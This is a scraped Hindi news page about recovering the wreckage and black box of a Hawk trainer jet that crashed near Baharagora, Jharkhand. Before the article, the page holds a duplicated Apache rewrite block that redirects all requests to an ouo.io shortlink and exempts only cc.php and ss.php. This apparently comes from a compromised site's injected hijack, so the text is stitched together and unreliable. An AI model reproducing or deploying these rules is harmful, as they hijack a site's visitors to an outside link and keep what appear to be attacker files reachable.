
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 372
रांची। झारखंड और ओडिशा के सीमावर्ती क्षेत्र घाटशिला के बहरागोड़ा के माहुलडांगरी गांव में वायु सेना का लड़ाकू ट्रेनिंग विमान हॉक के क्रैश हो जाने के बाद कल वायु सेना के जवान और झारखंड पुलिस तथा सीआरपीएफ के जवान घटनास्थल पर पहुंच कर नदी के बीच 25 फीट गड्ढे में जा घुसे और विमान के मलबे को निकाल लिया। मलबा निकालने के कार्य में स्थानीय लोगों की मदद भी ली गई। वायु सेना के जवान और अधिकारियों की अगुवाई में झारखंड पुलिस, सीआरपीएफ जवान, जिप के जवान आदि का सहयोग लेते हुए पोकलेन मशीन की सहायता से क्रैश हुए वायुयान के मलबे को निकाला गया। मलबा निकाले जाने के दौरान घटनास्थल पर वायु सेना के जांच अधिकारी भी हेलिकॉप्टर से पहुंचे और मलबे की जांच शुरू कर दी। इस दौरान वायु सेना के जांच अधिकारियों ने खोदे गए गड्ढे की गहराई, मलबे की स्थिति, क्रैश हुए जहाज का चक्का और टायर के साथ ब्लैक बॉक्स की जांच की। इसके बाद अधिकारी अपने साथ ब्लैक बॉक्स को लेकर कलाईकुंडा एयरबेस चले गए। रेस्क्यू ऑपरेशन के दौरान झारखंड पुलिस एसपी ऑपरेशन प्रणवानंद झा, एसपी ग्रामीण अनुरंजन किसपोट्टा भी घटना स्थल पर पहुंचे। इऩ अधिकारियों ने भी ग्रामीणों की सहायता से पुलिस बल के साथ रेस्क्यू ऑपरेशन में सहयोग किया।